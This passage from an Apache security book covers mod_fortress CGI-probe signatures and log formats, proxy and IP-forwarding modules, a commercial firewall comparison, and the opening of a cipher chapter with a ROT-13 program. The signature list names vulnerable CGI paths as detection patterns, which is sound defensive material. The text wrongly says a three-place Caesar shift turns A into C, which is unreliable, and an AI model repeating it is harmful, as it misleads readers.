/cgi-bin/MachineInfo; MachineInfo CGI Attempt [404]
/cgi-bin/flexform.cgi; Flexform CGI Attempt [404]
/cgi-bin/flexform; Flexform CGI Attempt [404]
/cgi-win/; /cgi-win/ Directory Listing Attempt [404]
/cgi-bin/day5datacopier.cgi; Day5datacopier CGI Attempt [404]
/cgi-bin/webutils.pl; Webutils CGI Attempt [404]
/cgi-bin/tpgnrock; Tpgnrock CGI Attempt [404]
/cgi-bin/webwho.pl; Webwho.pl CGI Attempt [404]
</FortressSignatures>

</IfModule>

Additionally, somewhere in httpd.conf, you specify your desired mod_fortress log
file and layout (the & sequence stands for a newline, and a trailing backslash
continues the directive on the next line):

FortressLog logs/fortress_log
FortressLogString = Source: %Ci & \
    = Destination: %Sh & \
    = Port: %Sp & \
    = Request Line: %Rr & \
    = Description: %Rd & \
    = Method: %Rm & \
    = Protocol: %Rp & \
    = Virtual Host: %Sv & \
    = User-Agent: %H[User-Agent] & \
    = Query Arguments: %Rq &

Table 16.6 summarizes mod_fortress log format directives.
TABLE 16.6 mod_fortress Log Directives

Directive   Significance
%Ch         Remote hostname
%Ci         Remote IP
%Cl         Local IP
%H          Headers (%H[User-Agent], %H[Accept], %H[Host])
%Rd         Request description (from the matching signature)
%Rm         Request method
%Rp         Protocol
%Rq         Query arguments
%Rr         Entire request line
%Ru         URI
%Sa         Server admin
%Sh         Server hostname (local hostname)
%Sn         Server name
%Sp         Server port
%Sv         Virtual host
%Td         Day
%Th         Hour
%Tm         Minute
%TM         Month
%Ts         Second
%Ty         Year
&           Newline

NOTE

Get mod_fortress at http://www.spunge.org/~io.
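To make the signature and log-string formats concrete, here is an added Python example (not mod_fortress's code). It parses signature lines in the form shown above, normalises the request path before matching (percent-decoding and collapsing ./ and // segments, the cheap evasions Whisker-style scanners use), and expands the Table 16.6 directives into the log layout shown earlier. The matching rule (exact path match after normalisation, with a bracketed 0 meaning log only), the port, and the sample request and headers are assumptions made for the example.

```python
"""Signature matching and log rendering in the style of mod_fortress.

Added example, not mod_fortress's own code. Assumptions: a signature matches
when the request path, after URL-normalisation, equals the signature path
exactly; a bracketed status of 0 means "log only"; the server port is 80.
"""
import posixpath
import re
from urllib.parse import unquote

# Signature lines in the chapter's "<path>; <description> [<status>]" form.
SIGNATURES_TEXT = """
/cgi-bin/; /cgi-bin/ Directory Listing attempt [0]
/cgi-bin/webdist.cgi; Webdist CGI Attempt [404]
/cgi-bin/handler; Handler CGI Attempt [404]
/cgi-bin/wrap; Wrap CGI Attempt [404]
"""

# The chapter's FortressLogString, with '&' standing for a newline.
LOG_FORMAT = ("= Source: %Ci & = Destination: %Sh & = Port: %Sp & "
              "= Request Line: %Rr & = Description: %Rd & = Method: %Rm & "
              "= Protocol: %Rp & = Virtual Host: %Sv & "
              "= User-Agent: %H[User-Agent] & = Query Arguments: %Rq")

_SIG_RE = re.compile(r"^(\S+);\s*(.*?)\s*\[(\d+)\]$")
_DIRECTIVE_RE = re.compile(r"%H\[([^\]]+)\]|%([A-Z][A-Za-z])|&")


def parse_signatures(text):
    """Return {path: (description, false_status)}."""
    sigs = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _SIG_RE.match(line)
        if not m:
            raise ValueError(f"bad signature line: {line!r}")
        sigs[m.group(1)] = (m.group(2), int(m.group(3)))
    return sigs


def normalise_path(uri):
    """Undo the cheap evasions scanners use (%xx encoding, '/./', '//',
    '/../') so '/cgi-bin/./%68andler' and '/cgi-bin/handler' compare equal.
    A trailing slash is kept so '/cgi-bin/' stays distinct from '/cgi-bin'."""
    path = unquote(uri.split("?", 1)[0])
    norm = posixpath.normpath(path)
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def render_log(fmt, fields, headers):
    """Expand the Table 16.6 directives this example knows about; unknown
    directives are left as written."""
    def expand(m):
        if m.group(0) == "&":
            return "\n"
        if m.group(1):                       # %H[Header-Name]
            return headers.get(m.group(1), "-")
        return fields.get(m.group(2), m.group(0))
    return _DIRECTIVE_RE.sub(expand, fmt)


def fortress_event(request_line, client_ip, server_host, vhost, headers, sigs):
    """Return {'status': int, 'log': str} for a matched request, else None."""
    method, uri, proto = request_line.split()
    hit = sigs.get(normalise_path(uri))
    if hit is None:
        return None
    path, _, query = uri.partition("?")
    fields = {"Ci": client_ip, "Sh": server_host, "Sp": "80", "Rr": request_line,
              "Rd": hit[0], "Rm": method, "Rp": proto, "Sv": vhost,
              "Ru": path, "Rq": query}
    return {"status": hit[1], "log": render_log(LOG_FORMAT, fields, headers)}


if __name__ == "__main__":
    sigs = parse_signatures(SIGNATURES_TEXT)
    ua = {"User-Agent": "Mozilla/4.77 (Win95; U)"}          # constructed
    for req in ("GET /cgi-bin/./%68andler?x=1 HTTP/1.0",    # evasion attempt
                "GET /index.html HTTP/1.0"):
        ev = fortress_event(req, "65.42.154.230", "www.spunge.org", "192.168.254.50", ua, sigs)
        print(req, "->", ev["status"] if ev else "clean")
        if ev:
            print(ev["log"])
```

The normalisation step is what separates a signature list from a real detector: without it, the second request in the sample ("%68andler" with a "./" segment) slips past an exact string comparison while still reaching /cgi-bin/handler on the server.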





mod_ip_forwarding

mod_ip_forwarding, by Jose Kahan, is a customizable module for forwarding the
client's IP address between a proxy (or a chain of proxies) and a main server, in a
semisecure way.

As explained in the documentation, mod_ip_forwarding

...forwards the IP@ address of a client inside a customizable HTTP header. If the client sends
such a header, it'll substitute the value of r->connection->remote_ip with the value given in
the header (only in this ASCII temp buffer). This way, CGI scripts can work with the correct
IP@ without having to be modified. When received, the header won't be cleared, so that it's
possible to have cascading proxies. The administrator must specify which proxies can forward
this header. If an untrusted proxy sends such a header, it'll be removed from the headers, and
an error message will be logged.

mod_ip_forwarding supports four directives:

• AcceptForwardedClientIPAddress: authorizes accepting an X_Client_Address
  header.
• AuthorizedProxies: sets the list of proxies authorized to send an
  X_Client_Address header.
• ForwardClientIPAddress: controls sending of the X_Client_Address header.
• X_ClientIPAddrHeader: sets a customizable header string for sending the client
  IP address.

The AuthorizedProxies list is the security boundary: any address on it can make the
backend believe a request came from anywhere, so list only proxies you operate, and
never the address range your clients connect from.

NOTE

Get mod_ip_forwarding at
http://dev.w3.org/cgi-bin/cvsweb/apache-modules/mod_ip_forwarding/.





mod_limitipconn

mod_limitipconn, from David Jao, is an Apache module that limits the maximum
number of simultaneous connections per IP address. This module enables inclusion
and exclusion of files based on MIME type.

As explained in the mod_limitipconn documentation:

...this module will not function unless mod_status is loaded and the ExtendedStatus On
directive is set. The limits defined by mod_limitipconn.c apply to all IP addresses connecting
to your Apache server. Currently, there is no way to set different limits for different IP
addresses. Connections in excess of the limit result in a stock 403 Forbidden response. The job
of returning a more useful error message to the client is left as an exercise for the reader.

Installation is quick and painless. After downloading the package, which requires
Apache 1.3.22+, unpack it:

tar xzvf mod_limitipconn-0.03.tar.gz

Next, patch 1.3.22:

cd apache_1.3.22
patch -p1 < ../mod_limitipconn-0.03/apachesrc.diff
cp ../mod_limitipconn-0.03/mod_limitipconn.c src/modules/extra/

Then, generate the configuration:

./configure --activate-module=src/modules/extra/mod_limitipconn.c --with-forward

And finally, make and install the module:

make && make install

mod_limitipconn's configuration is straightforward:

<IfModule mod_limitipconn.c>
    <Location /somewhere>
        MaxConnPerIP 3
        # exempting images from the connection limit is often a good
        # idea if your web page has lots of inline images, since these
        # pages often generate a flurry of concurrent image requests
        NoIPLimit image/*
    </Location>
    <Location /mp3>
        MaxConnPerIP 1
        # In this case, all MIME types other than audio/mpeg and video*
        # are exempt from the limit check
        OnlyIPLimit audio/mpeg video
    </Location>
</IfModule>

Remember that everyone behind a NAT gateway or a corporate proxy shares one source
address, so set MaxConnPerIP with those populations in mind, and keep mod_status
itself restricted (it must be loaded for this module to work, and it reveals every
in-flight request to anyone who can reach /server-status).

NOTE

Get mod_limitipconn at http://dominia.org/djao/limitipconn.html. Also, you can
obtain a Perl version (Apache::LimitIPConn) at
http://dominia.org/djao/limitipconn-perl.html.





mod_rpaf

As described in its documentation, mod_rpaf, the reverse proxy add_forward module
from Thomas Eibner, is

...for backend Apache servers what mod_proxy_add_forward is for frontend Apache servers. It
does exactly the opposite of mod_proxy_add_forward written by Ask Bjørn Hansen. It changes
the remote address of the client visible to other Apache modules when two conditions are
satisfied. First condition is that the remote client is actually a proxy that is defined in
httpd.conf. Secondly if there is an incoming X-Forwarded-For header and the proxy is in its
list of known proxies it takes the last IP from the incoming X-Forwarded-For header and
changes the remote address of the client in the request structure. It also takes the incoming
X-Host header and updates the virtualhost settings accordingly.

It's easy to use and needs only three directives: RPAFenable, RPAFsethostname, and
RPAFproxy_ips. RPAFenable's and RPAFsethostname's values must be either On or Off
(the latter controls the X-Host virtual host rewriting), and RPAFproxy_ips takes IP
addresses as arguments. You use RPAFproxy_ips to identify your frontend proxies by
address, so that only their X-Forwarded-For headers are believed:

RPAFenable On
RPAFsethostname On
RPAFproxy_ips 127.0.0.1 10.0.0.1

Because mod_rpaf takes the last address in X-Forwarded-For, a single trusted proxy
layer yields the true client; if you chain several of your own proxies, the last
address is the next proxy in the chain, not the client, so list each layer only where
it terminates the client connection.

NOTE

mod_rpaf is available for Unix, Windows, and NetWare, but requires Apache 1.3.4 or above.
You can download it at http://stderr.net/apache/rpaf/.
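Both mod_ip_forwarding and mod_rpaf rest on one rule: believe a forwarded-address header only when the TCP peer is a proxy you listed, and strip it otherwise. The following added Python example (not either module's code) implements that rule next to the naive version that trusts the first X-Forwarded-For value from anyone, which lets any client choose the address your access controls and logs will see. It also walks back through a chain of trusted proxies, which goes beyond mod_rpaf's take-the-last-IP behaviour; the addresses are constructed, and the trusted list mirrors the RPAFproxy_ips example above.

```python
"""Deciding which client address to trust behind a reverse proxy.

Added example, not mod_ip_forwarding's or mod_rpaf's code. Rule: honour
X-Forwarded-For only when the TCP peer is a listed proxy, otherwise strip it
and say so; when honoured, walk the list right-to-left past our own hops.
Sample addresses are constructed.
"""
import ipaddress


def _as_ip(text):
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def client_address(remote_addr, headers, trusted_proxies, header="X-Forwarded-For"):
    """Return (client_ip, headers_to_pass_on, note).

    remote_addr      the TCP peer Apache actually accepted the connection from
    trusted_proxies  addresses or networks (your RPAFproxy_ips list)
    """
    nets = [ipaddress.ip_network(p, strict=False) for p in trusted_proxies]

    def trusted(ip):
        return ip is not None and any(ip in n for n in nets)

    hdrs = dict(headers)
    forwarded = hdrs.get(header)
    if forwarded is None:
        return remote_addr, hdrs, "no forwarding header"
    if not trusted(_as_ip(remote_addr)):
        # An arbitrary client set the header: drop it and log, as
        # mod_ip_forwarding does for an unauthorized proxy.
        del hdrs[header]
        return remote_addr, hdrs, f"{header} from untrusted peer {remote_addr} removed"
    # Right to left: the rightmost value was appended by the proxy that
    # talked to us; skip any further hops that are also ours.
    for hop in reversed(forwarded.split(",")):
        ip = _as_ip(hop)
        if ip is None:
            return remote_addr, hdrs, f"malformed {header} value {hop.strip()!r} ignored"
        if not trusted(ip):
            return str(ip), hdrs, f"client taken from {header}"
    return remote_addr, hdrs, f"{header} lists only trusted proxies"


def naive_client_address(remote_addr, headers):
    """The mistake to avoid: believing the first X-Forwarded-For value from anyone."""
    forwarded = headers.get("X-Forwarded-For")
    return forwarded.split(",")[0].strip() if forwarded else remote_addr


TRUSTED = ["127.0.0.1", "10.0.0.0/24"]     # the RPAFproxy_ips hosts, as a network

if __name__ == "__main__":
    # The client sent its own header; our proxy 10.0.0.1 appended the real address.
    spoofed = {"X-Forwarded-For": "1.2.3.4, 203.0.113.9"}
    print(naive_client_address("10.0.0.1", spoofed))          # 1.2.3.4 (spoofed)
    print(client_address("10.0.0.1", spoofed, TRUSTED)[0])    # 203.0.113.9
    # Same header straight from an untrusted peer: header dropped, peer kept.
    print(client_address("198.51.100.7", {"X-Forwarded-For": "1.2.3.4"}, TRUSTED))
```

Whichever module you deploy, test it the way the sample does: send a forged X-Forwarded-For directly to the backend's port and confirm the access log records the peer, not the forged value.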





mod_tproxy

mod_tproxy, from Steve Kann, enables the standard mod_proxy module to handle
transparent proxy requests. It can make Apache function as a Web server and a proxy
server simultaneously (with a single instance) and can be built as a compiled-in
module or a DSO. As explained in its documentation, mod_tproxy

...is designed to be used in conjunction with Linux IP TRANSPARENT PROXY firewalling, or
any similar system on another operating system. Transparent proxying redirects tcp connec-
tions destined for a foreign host to a local port. A local server can then accept the connection,
and act as a proxy. getsockname() will reveal the original destination host.

Get mod_tproxy at http://www.stevek.com/projects/mod_tproxy/.

NOTE

Note that third-party tools and modules a) may not always work as intended on your
platform; and b) occasionally evidence security vulnerabilities themselves. Hence,
carefully watch their mailing lists for updates, or if they have no mailing list,
check their Web sites. Security software, like any software, can sometimes be flawed.
Other Apache Proxy Tools

Finally, Table 16.7 lists a few useful Perl-based proxy tools.

TABLE 16.7 Other Apache-Related Proxy Tools

Tool                   Description and Location

Apache::DumpHeaders    This Perl package, from Ask Bjørn Hansen, watches HTTP
                       transactions via their headers, and provides a skeleton
                       for a generic proxy system. Get it at
                       http://www.cpan.org/authors/id/ABH/Apache-DumpHeaders-0.93.tar.gz.

Apache::No404Proxy     This Perl Apache package exploits Google's cache. As the
                       author explains, "Apache::No404Proxy serves as a proxy
                       server, which automatically detects 404 responses and
                       redirects your browser to Google cache...This proxy may
                       or may not break terms of service of Google." Either way,
                       it's an interesting tool. Get it at
                       http://www.cpan.org/authors/id/M/MI/MIYAGAWA/Apache-No404Proxy-0.03.tar.gz.

Apache::Proxy          This package from Ilya Obshadko provides a Perl interface
                       to mod_proxy. Get it at
                       http://www.cpan.org/authors/id/X/XF/XFIRE/Apache-Proxy-0.02.tar.gz.

Apache::ProxyPass      This package from Michael Smith implements ProxyPass in
                       Perl. Get it at
                       http://www.cpan.org/authors/id/MJS/Apache-ProxyPass-0.06.tar.gz.

Apache::ProxyRewrite   This package from Christian Gilmore is a mod_perl
                       URL-rewriting proxy. Get it at
                       http://www.cpan.org/authors/id/C/CG/CGILMORE/Apache-ProxyRewrite-0.15.tar.gz.

Apache::ProxyStuff     This package from Jason Bodnar is a mod_perl
                       header/footer/proxy module. Download it from
                       http://www.cpan.org/authors/id/J/JB/JBODNAR/Apache-ProxyStuff-0.10.tar.gz.





Commercial Firewalls 


If yours is a commercial enterprise, you'll likely need more than a mere proxy and 
more than a general purpose freebie firewall. This section focuses on several indus- 
trial strength firewalls, listed in Table 16.8. 
TABLE 16.8 Selected Commercial Packages

Field                  Details

Product                3Com OfficeConnect
Access Control         Yes
Algorithms             DES, TripleDES, ARC-4
Authentication         Yes—through the required firewall
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              25, per companion firewall limitations
Max Connections        25
Packet Filtering       Yes
Platforms              Platform-independent
Stateful Inspection    Yes
Warranty               3Com Lifetime Limited
Web Config             Yes

Product                Ashley Laurent BroadWay
Access Control         Yes
Algorithms             DES, TripleDES, IDEA, TripleIDEA, CAST, Blowfish, RC4, and RC5
Authentication         X.509, DSS, RSA, IKE, and ISAKMP
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              unspecified
Max Connections        unspecified
Packet Filtering       Yes
Platforms              ATMOS, OSE, pSOS, NT, 95, 98, ME, 2000, MacOS 8-9, Linux
Stateful Inspection    Yes

Product                Check Point SecureServer
Access Control         Yes, through a powerful integrated firewall
Algorithms             AES (128-to-256-bit), Triple DES (168-bit), DES 56-bit, FWZ-1 48-bit,
                       DES-40 (40-bit), and CAST-40
Authentication         SecureID, LDAP, TACACS+, RADIUS, X.509
Auto-Alerts            Yes, through integrated firewall
Content Filtering      Yes, through integrated firewall
IP Forwarding          Yes, through integrated firewall
IPSEC Gateway          Yes, through integrated firewall
LAN/WAN/DMZ            Yes, through integrated firewall
Max Connections        20,000 concurrent VPN tunnels
Packet Filtering       Heavy-duty, through a powerful integrated firewall
Platforms              Solaris 7 (32bit), Solaris 8 (32 and 64bit), Red Hat 6.2-7.0, Windows
                       2000 Server and Advanced Server
Stateful Inspection    Yes, through a powerful integrated firewall
Web Config             No, but an excellent Visual Policy Editor

Product                Chrysalis-ITS Luna
Access Control         Yes
Algorithms             DES, TripleDES
Authentication         SHA-1, MD5, RSA, Diffie-Hellman, DSA, IKE
Platforms              Windows NT 4.0; Solaris 2.5.1, 2.6 & 2.7 (Solaris 7); HP-UX 10.20;
                       FreeBSD 2.2.7 (note that hardware config is relevant: 30, 60 Sun
                       Sparc Ultra 5, 10)
Warranty               Depends on model

Product                Cisco 7200
Access Control         Yes
Algorithms             DES and 3DES
Authentication         RSA, Diffie Hellman, SHA-1, MD5, wide certificate support (Entrust,
                       Verisign, Microsoft, iPlanet, Baltimore Technologies), X.509 digital
                       certificates (RSA signatures), shared secrets, Simple Certificate
                       Enrollment Protocol, RADIUS, TACACS+, CHAP/PAP (RFC 1994)
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              See Max Connections
Max Connections        1500 tunnels, upgradeable to 5,000
Packet Filtering       Yes
Platforms              Hardware-based
Stateful Inspection    Yes
Warranty               Depends on config
Web Config             Cisco Secure Policy Manager, VPN Manager

Product                Cocentric XO
Access Control         Yes
Algorithms             DES, TripleDES
Authentication         Yes—but unclear from documentation, contact vendor for more
                       information
Auto-Alerts            Yes—but unclear from documentation; contact vendor for more
                       information (managed services, too)
Content Filtering      Yes—but unclear from documentation; contact vendor for more
                       information
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Packet Filtering       Yes
Platforms              Hardware-specific (integrates with Cisco)
Stateful Inspection    Yes
Warranty               Depends on options; see VPN bundle specs

Product                Cylink NetHawk
Access Control         Yes
Algorithms             DES, FIPS 46-2 (56-bit keys), Standard CBC, Triple-DES
Authentication         PKCS 10, Diffie-Hellman, X.509 v3, CRL, IKE Features, Pre-shared keys,
                       DSS authentication (128 bytes), RSA (1024 bits), NIST FIPS PUB 186,
                       Quick/Main/Aggressive modes, HMAC-MD5, HMAC-SHA-1, DES-MAC
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              See Max Connections
Max Connections        20,000
Packet Filtering       Yes
Platforms              Microsoft Windows NT, Sun Solaris
Stateful Inspection    Yes
Warranty               Depends on config
Web Config             GUI client

Product                Data Fellows F-Secure
Access Control         Yes
Algorithms             DES, 3-DES, CAST, Blowfish
Authentication         Certificate-based with RSA signatures, shared secrets, IKE-XAUTH
                       secured, RADIUS, HMAC-MD5, HMAC-SHA-1, IKE (Main/Aggressive),
                       Diffie-Hellman
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Packet Filtering       Yes
Platforms              Windows NT 4.0, Windows 95, Windows 98, Windows 2000, Solaris
                       Sparc, Linux
Stateful Inspection    Yes
Web Config             Integrated GUI—very nice

Product                Genuity Advantage
Access Control         Yes
Algorithms             DES, TripleDES
Authentication         PAP, CHAP, SHA-1, MD5, L2F, L2P, IKE, RADIUS, Entrust, Verisign
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              100, 400, or 5,000, depending on model
Max Connections        Depends on model, but in the thousands to tens-of-thousands range
Packet Filtering       Yes
Platforms              N/A—this is a switch-based solution
Stateful Inspection    Yes
Warranty               Varies, depending on model
Web Config             Yes

Product                IBM AIX VPN
Access Control         Yes, IP address and subnet mask for IPv4 and IPv6, interface, protocol
                       and port numbers, inbound or outbound packets, forwarded or local
                       packets, fragmented packets
Algorithms             DES—Data Encryption Standard, Triple DES, Null encryption, MD5—
                       Message Digest 5, SHA1—Secure Hash Algorithm 1
Authentication         Internet Key Exchange for IP Version 4 and 6, Signature mode using
                       RSA Digital Certificates, Preshared Key Mode, Certificate Revocation
                       Lists, Manual Tunnels for IP Versions 4 and 6
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Packet Filtering       IP address and subnet mask for IPv4 and IPv6, interface, protocol and
                       port numbers, inbound or outbound packets, forwarded or local
                       packets, fragmented packets
Platforms              Unix
Stateful Inspection    Yes
Warranty               1 year
Web Config             No, but an excellent Visual Policy Editor

Product                Icon West Qwest Firewall and VPN
Access Control         Yes
Algorithms             DES, TripleDES
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Packet Filtering       Yes
Stateful Inspection    Yes

Product                Indus River Aurorean Virtual Network
Access Control         Yes
Algorithms             40, 56, 128, 168 DES/TripleDES, Microsoft Point-to-Point Encryption
                       (MPPE)
Authentication         HMAC SHA1, HMAC MD5, MS-CHAP, RADIUS, Token Cards, IKE
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              See Max Connections
Max Connections        between 500 and 20,000, depending on model
Packet Filtering       Yes
Platforms              Hardware-based ANG-7050 and ANG-3000
Stateful Inspection    Yes
Warranty               Varies depending on model and config; see vendor
Web Config             Yes. Also, CLI-based Telnet config, which is excellent for script-based
                       manipulation and automation

Product                Lucent Technologies VPN Firewall Brick 1000
Access Control         Yes
Algorithms             DES, Triple DES, RC4
Authentication         Entrust, PKI, VeriSign, Baltimore X.509, MD5 SHA-1
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              N/A applies to networks
Max Connections        3000 Tunnels
Packet Filtering       Yes
Platforms              N/A—hardware-based solution
Stateful Inspection    Yes
Web Config             Integrates with Security Management Server

Product                Network Associates Gauntlet 6.0
Access Control         Yes
Algorithms             DES, 3DES, CAST encryption standards
Authentication         RADIUS, Secure ID, S/Key, CryptoCard, LDAP, and DSS
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes, with integrated firewall
Packet Filtering       Yes
Platforms              Supports Solaris 8, HP-UX 11.0
Web Config             Visual Policy Editor (GUI)

Product                Netscreen Security Systems Netscreen 1000
Access Control         Yes, through integrated firewall
Algorithms             DES, TripleDES
Authentication         IKE, PKI, X.509, VeriSign, Entrust, Microsoft
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              15,000
Max Connections        500
Packet Filtering       Yes, through integrated firewall
Platforms              Hardware-based solution
Stateful Inspection    Yes
Warranty               Hardware: 1 year. Software: 90 days
Web Config             Yes

Product                Symantec Enterprise VPN
Access Control         Yes
Algorithms             N/A
Authentication         Defender, CryptoCard, SecureID, S/Key, RADIUS, TACACS, IKE, RC-2,
                       DES, TripleDES
Auto-Alerts            Yes
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              Default is 10, user-specifiable
Max Connections        Default is 10,000, user-specifiable
Packet Filtering       Yes
Platforms              Windows NT, Windows 2000, Solaris, HP-UX
Stateful Inspection    Yes
Web Config             Native GUI

Product                Red Creek Ravlin 7160
Access Control         Yes
Algorithms             DES, TripleDES
Authentication         HMAC-MD5, SHA-1, RADIUS, X.509
Auto-Alerts            Yes. Multiple destination forwarding of event logs by entry type and
                       severity, forwarding of SNMP traps to external management systems
                       (OpenView, Tivoli, Spectrum) for automation, paging, and so on
Content Filtering      Yes
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Packet Filtering       Yes
Platforms              Hardware-based solution, but ships with clients for Win
                       95/98/2000/ME/NT
Stateful Inspection    Yes
Warranty               1 year
Web Config             SNMP

Product                Microsecure
Access Control         Yes. Admins can restrict access by IP addresses, protocols, services,
                       users, or time frames
Algorithms             DES, TripleDES, Blowfish
Authentication         Yes. Data: HMAC-MD5 and SHA-1. Humans: Microsecure Firewalls
                       Password, RADIUS, One-time Password (S/Key), RSA SecureID Tokens,
                       Kerberos, Digital Certificates, or an IKE Pre-shared secret key
Auto-Alerts            Yes. Alarms, alerts, warnings, notices
Content Filtering      Yes. GET, PUT, POST, CONNECT, Java, JavaScript, ActiveX, redirects,
                       and so on
IP Forwarding          Yes
IPSEC Gateway          Yes
LAN/WAN/DMZ            Yes
Max Users              Unlimited but controllable
Max Connections        Unlimited but controllable
Packet Filtering       Yes
Platforms              Solaris, SolarisX86, Linux, Unix
Stateful Inspection    Yes
Warranty               1 Year
Web Config             Yes





Table 16.9 lists other popular commercial firewall vendors. 


TABLE 16.9 Popular Commercial Firewall Vendors

Vendor                   Address
3Com                     http://www.3com.com
Astaro                   http://www.astaro.com/
Check Point              http://www.checkpoint.com/
Cisco                    http://www.cisco.com/
CMS (Praetor)            http://www.cmsconnect.com/Praetor/prMain.htm
CyberGuard               http://www.cyberguard.com/HOME/home.html
Data Check Services      http://www.datacheck.ca/
EBiz                     http://www.ebizenterprises.com/
Elron                    http://www.elronsoftware.com/
eSoft                    http://www.esoft.com/
Evidian                  http://www.evidian.com/
Firewall Servers         http://www.firewall-servers.com/
Genuity                  http://www.genuity.com/services/index.htm
GTA (Robox)              http://www.gta.com/
InfoExpress              http://www.infoexpress.com/
InnerTek                 http://www.innertek.com/
J. River                 http://www.jriver.com/
KarlNet                  http://www.gbnet.net/karlnet/
Knowledge Group          http://www.ktgroup.co.uk/
LightHouse               http://www.lh.net/products/products.html
McAfee                   http://www.mcafee.com/
Merilus                  http://www.merilus.com/products/
MultiTech                http://www.multitech.com/
NetBSD Firewall          http://www.dubbele.com/
NetIQ                    http://www.netiq.com/
NetMind                  http://www.netmind-firewall.com/
NetScreen                http://www.netscreen.com/
NetWolves                http://www.netwolves.com/nss.htm
Network-1                http://www.network-1.com/products/index.html
Nexland                  http://www.nexland.com/index.cfm
Nokia                    http://www.nokia.com/securenetworksolutions
Novell                   http://www.novell.com/
OpenDoor                 http://www.opendoor.com/
PresiNet                 http://www.presinet.com/Main/Deadbolt.htm
Rainfinity               http://www.rainfinity.com/
RapidStream              http://www.rapidstream.com/
RedCreek                 http://www.redcreek.com/
Secure Computing         http://www.securecomputing.com/
Securepoint              http://www.securepoint.cc/
ServGate                 http://www.servgate.com/
SmithMicro               http://www.smithmicro.com/
SofaWare                 http://www.sofaware.com/
Stoneylake               http://www.stonylakesolutions.com/
Sygate Technologies      http://www.sygate.com/
Symantec Corporation     http://enterprisesecurity.symantec.com/
Telos                    http://www.telos.com/
V-One                    http://www.v-one.com/
WorldCom                 http://www1.worldcom.com/us/
ZoneLabs                 http://www.zonelabs.com/
ZyXel                    http://www.zyxel.com/

Summary 


Apache was never intended to be a full-fledged firewall, but it does well as a proxy
for several machines. However, if yours is an enterprise network, consider a
commercial firewall solution. Doing things the homegrown way is admirable, but when
money's on the line, nothing takes the place of the proper tools.


17

Apache and Ciphers

IN THIS CHAPTER

• What Is a Cipher?
• MD5
• SSL
• Other Ciphers

Apache, through either modules or Apache-SSL, supports a wide range of ciphers, and
this brief chapter introduces them.


What Is a Cipher? 


The humdrum definition of the term cipher is simply this: 
A cipher is any mathematical operation with which you 
encrypt or encode text or data, usually to hide that text or 
data from unauthorized eyes. The cryptography field 
concerns itself chiefly with ciphers. 


The word cryptography stems from two ancient words: krypto (hidden) and graphia
(writing). Cryptography, therefore, is the science of secret writing. In cryptography,
you create messages that only authorized personnel can read. To everyone else,
cryptographic or encrypted text is gibberish, and you create that gibberish using
ciphers.


Early cryptography was primitive, often consisting of anagram-style scrambling, in
which authors merely rearranged a message's characters (apache becomes pehaca).
However, in roughly 2000 B.C. during the reign of Mentuhotep III, the Egyptians
dispensed with jumbled, plain text passwords. Over those next 1,000 years, in
addition to fractions and primitive algebra, Egyptians developed rudimentary
cryptography.


One method the Egyptians used was to write their 
messages downward (as opposed to across) on long strips 
of papyrus, laid horizontally adjacent to one another, but 
of variable lengths. They would then wrap these strips 
around large sticks or columns. Unless you knew precisely 
where on the target column to begin wrapping each strip, and the order in which
the author meant strips to be wrapped, the message would never emerge because the 
descending ideographs would never line up properly. 


Later in Roman times, messengers used substitution ciphers, the first ciphers that 
didn’t require any external physical device or medium. Early substitution ciphers 
used simple formulas that uniformly converted each character to another. Julius 
Caesar popularized one substitution cipher that consisted of shifting characters 
ahead by three. Hence, the letter A becomes C, the letter B becomes D, and so on. 
This cipher historically became known as “Caesar’s Cipher.” 


Today, substitution ciphers exist but aren't used for serious data hiding. One is
ROT-13, a substitution cipher that shifts characters 13 positions ahead (A becomes N,
B becomes O, and so on). Here's a simple ROT-13 implementation:


#include <stdio.h>
#include <ctype.h>

/* test-rot13.c
   A simple ROT-13 substitution cipher.
   To compile: "cc test-rot13.c -o rot13" */

int main(void) {
    int user_input;
    printf("Please enter some text to encrypt or decrypt\n");
    printf("--------------------------------------------\n");
    /* Read until end of input; getchar() returns EOF (not 0) when input ends */
    while ((user_input = getchar()) != EOF) {
        /* Shift letters 13 places, wrapping within the alphabet;
           anything that is not a letter passes through unchanged */
        if (islower(user_input))
            user_input = 'a' + (user_input - 'a' + 13) % 26;
        if (isupper(user_input))
            user_input = 'A' + (user_input - 'A' + 13) % 26;
        putchar(user_input);
    }
    return 0;
}


Running this book's title through the ROT-13 implementation turns that string into
seeming gibberish:

./rot13
Please enter some text to encrypt or decrypt
Maximum Apache Security
Znkvzhz Ncnpur Frphevgl

Likewise, running the encoded string back through brings back this book's title:

./rot13
Please enter some text to encrypt or decrypt
